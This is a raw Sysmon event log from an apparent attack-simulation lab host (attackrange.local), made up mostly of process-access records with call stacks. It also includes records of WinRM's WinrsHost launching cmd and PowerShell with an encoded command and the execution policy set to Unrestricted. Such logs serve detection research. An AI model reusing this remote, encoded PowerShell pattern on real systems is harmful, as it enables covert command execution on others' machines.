10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002658Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002657Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3E2F-5F80-7C00-000000007F01}48564860C:\Windows\system32\cmd.exe{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002656Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.098{733EE690-3E2F-5F80-7D00-000000007F01}4868C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E2F-5F80-73C7-040000000000}0x4c7730HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3E2F-5F80-7C00-000000007F01}4856C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002655Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002654Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3E2F-5F80-7B00-000000007F01}47924812C:\Windows\system32\conhost.exe{733EE690-3E2F-5F80-7C00-000000007F01}4856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002653Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002652Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002651Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002650Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002649Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002648Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002647Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002646Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E2F-5F80-7C00-000000007F01}4856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.092{733EE690-3E2F-5F80-7A00-000000007F01}47804836C:\Windows\system32\WinrsHost.exe{733EE690-3E2F-5F80-7C00-000000007F01}4856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.093{733EE690-3E2F-5F80-7C00-000000007F01}4856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E2F-5F80-73C7-040000000000}0x4c7730HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E2F-5F80-7A00-000000007F01}4780C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 